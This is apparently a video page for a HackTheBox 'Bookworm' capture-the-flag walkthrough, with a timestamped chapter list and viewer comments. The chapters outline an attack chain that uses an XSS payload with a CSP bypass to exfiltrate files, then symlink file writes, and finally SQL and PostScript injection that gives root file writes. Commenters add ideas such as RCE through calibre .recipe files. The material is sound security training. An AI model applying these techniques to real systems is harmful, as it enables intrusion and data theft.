HackTheBox - Bookworm
HTML-код
- Опубликовано: 16 июл 2024
- 00:00 - Introduction
00:50 - Start of nmap
04:30 - Discovering a potential XSS in the Notes field of an order. Content Security Policy (CSP) blocks us, because JS cannot be on the same page. Looking for a file upload functionality.
08:29 - Finding out we can upload anything we want to the avatar. This should allow us to bypass the CSP in the book edit field
11:55 - Confirmed XSS on the page, checking if there's an IDOR Vulnerability that allows us to add notes to other people's items by creating a second account
16:00 - Creating a Python Script that will automatically poison items in peoples basket (cart)
28:00 - Backet Poisoner script is completed
28:50 - Creating a JavaScript payload, explaining why I'm doing await, fetch, and helper functions.
40:15 - Having the XSS Payload fetch profile, look for orders, then perform a get on all orders to examine the order page. Then send us the HTML of that page
49:55 - Creating a Python Flask Server that will save all of the orders the XSS Payload sends us
56:00 - Examining orders, discovering there is a "Download Everything" URL. Didn't show it but there is no IDOR Vulnerability here, need to have the XSS Trigger it. Exfilling /etc/passwd
01:12:00 - Extracting database.js, which contains the database information. The password lets us onto the system as Frank
01:15:52 - EDIT: Examining the source code to show why downloading a single book was not vulnerable. Talking about setting ROOT on res.download of express
01:21:04 - Enumerating the box as Frank discovering a second web application listening on 3001
01:30:00 - Looking at the source code to the book converter.
01:36:20 - Exploiting a SSRF/File Disclosure vulnerability in the Book Converter, but it doesn't get us anything
01:42:18 - Finding Arbitrary File Write vulnerability in the Book Converter by abusing SymLinks to bypass an File Extension Check.
01:51:50 - Shell as Neil who can run the GenLabel binary with Sudo, examining it to discover a SQL + PostScript Injection
01:57:10 - Using the SQL Injection to Inject a FileWrite command in the PostScript file which then gives us Arbitrary File Write as root
0:35 I fully expected that sentence to continue with "and by the end of the day, I had created my own Javascript framework".
and then you realise that he doesn't understand the await operator, so he puts it even when he calls the async function LOL (line 13 on VC @46:30), also he could have read the error message, it says right there.
Wow nicely done! I really like the way you have used classes in Python. The reason why asynchronous works so well, is because it tells the CPU to switch threads while there is slack time when it isn't really processing something, so it jumps to another thread within the process and it does that constantly. If you're cooking you're also not going to stop and do nothing while the oven is preheating. 😅 👏
Ooh and a const in a loop is not possible, since it is a constant and of an immutable type which can only be declared ones and not updated within a while loop.
Thanks that makes total sense
I like how your videos have become reminders to release my season0 writeups lol
great work as always man
That was some voodoo! I understood about 10% at best. But i really enjoyed watching this. Great job as always!
Nice work ippsec, keep going
Loved this box! I used xhr api for the js script but I’ll definitely switch to fetch api in the future
I love what you do and learn a lot thanks ippsec❤
Thank you for the video realy appreciate it !
Thanks sirji for this video ❤❤❤
@31:00 the best way to try js code is not the console prompt, but by clicking the icon that it's on the far right of the console prompt, called: multi-line editor mode.
Great video as always, been looking forward to this one.
Btw I'm not sure if you're aware, but in the converter web app it's also possible to get RCE by uploading a file with the extension .recipe which contains python code. Apparently the calibre converter will happily run any python code in .recipe files :)
I had no idea. That is cool
Hi, how did you find this out?
Ippsec I hope you start doing live boxes some times just for us to see your thought process and maybe get a glimpse of how you do in real engagements
1:27:26 I love this "oh". This was so funny
Push!
what vs code extensions do you use? autocomplete looks awesome
That is Github Copilot
Maybe that's a silly question, but, in the last piece when we try to write the key for root, we cannot just modify the entry in the database with the postscript payload and re run the script, pretending there was no sql injection in the python script? Sorry about my probable grammar errors in that sentence 😅 . Great video as always, we love IppSec.
Umm I hate myself right now, most likely you could totally do that 😂 I just didn’t think of it
@@ippsec I'm sorry i didnt meant to point it out because i want to say that was a better way, that was no my intention at all, i was just wondering if that was possible, and to test my level of understanding 🤣. You show anyways that the script was vulnerable to sql injection, and how to benefit from that, so definitely your way is the best for us and for the sake of learning, as the purpose of your videos are sharing knowledge. As always you re the goat, thanks for all your videos.
@@MusicDimensionRUclips No i'm happy you did haha. Was more sarcastic
@@ippseci totally get the sarcasm. I'm happy to know that modify the entry was an option that could work, I'm still learning and see that maybe I get something right make me willing to learn more and definitely you're the right place to learn, your approach to solve the boxes is amazing, the explanations of the steps you take to find the informations and the beyond root part is gold.
@@MusicDimensionRUclips I believe it's not possible to write to the file /root/.ssh/authorized_keys doing what you suggested because each injectable column can contain only up to 20 characters:
Injectable columns: name, addressLine1, addressLine2, town, postcode
MariaDB [(none)]> desc bookworm.Users \G
*************************** 2. row ***************************
Field: name
Type: varchar(20)
*************************** 6. row ***************************
Field: addressLine1
Type: varchar(20)
*************************** 7. row ***************************
Field: addressLine2
Type: varchar(20)
*************************** 8. row ***************************
Field: town
Type: varchar(20)
*************************** 9. row ***************************
Field: postcode
Type: varchar(20)
So, if you tried to change one of those columns to the PostScript payload, you would get an error saying you tried to insert too many characters on a column.
Isn't the requests.Session() an instantiated object and therefore mutable? So wouldn't it be passed by object reference, meaning you wouldn't have to return anything to make changes to its data?
I may be wrong, thoughts?
I think you are correct - However, that is now how my brain things code/functions/etc should work. So I avoid taking advantage of that.
@ippsec ah yeah, I get what you mean. I love python but the weak typing makes things really ambiguous sometimes.
Hi IppSec, there's something I'd like to clarify to ensure I'm not misunderstanding. We observed the "script-src 'self'" directive in the HTTP response, which, as I understand it, allows scripts to run only from the same origin as the webpage. However, we also made an attempt to provide our IP address (10.10.14.8) which is different origin. Am I missing something? confused me because you also said that "I dont know what is blocking us"
I believe it blocks the page itself from running Javascript on itself, which is why the Alert() did not work, and there's something that's blocking you from loading scripts externally, so you can't just directly point it at yourself. Which is why I needed to host the script on the server through Avatar. I never run code from a server on my own IP, I just exfil data there.
That said, in hindsight, I never tried to just point the javascript back to myself then do the malicious things there. I don't think it would work, but its possible would be a good thing to try out yourself and see why it does or doesn't work.
One more question: when we identify SQL injection in GenLab and you mentioned that ‘it is not giving any new privileges,’ considering this binary runs with sudo, wouldn’t executing a system command through SQL injection grant us a privileged shell? I mean without needing ps2pdf, I might be mistaken, but I’d like to find out.
Running through SQL would still be a SQL User not root. So having the option to exploit SQL or the Injection to PDF Generator... I go for PDF Gen since that is running as root.
hey ippsec would you consider doing THM too?
Curious about this too.
Nope, when they launched we got off on the wrong foot and I also didn’t enjoy their content. I feel there’s less effort put into making sure it’s quality content. Could have changed now; but I have no reason to check them out. Also I do work for HackTheBox now, did not for the first few years of doing videos. So not only would I be highlighting a site I don’t support, I’d also be highlighting a competitor
@@ippsec in terms of content quality, you're absolutely right. TryHackMe seems to be making very "small" boxes in comparison to HackTheBox. so I understand your point.
@@ippsec you are HTB employee of the month (read this with Simeon Yetarian's voice)
Good point
First
Ip, Ipp and Ippy
when did you learn python ippgoat
Ippsec Is Python Charmer 😂
@ippsec when copying node source code, you can skip the node_modules. much lighter and faster.
23:33
Too Many Joke About Javascript In Programming Memes , Call That Javascript Is Drunken Language 😂😂
Async Await Just Work On Function 😅
That's What I Know, Im From Java Dev 😂
1:14:55 ipp-womp-womp.mp3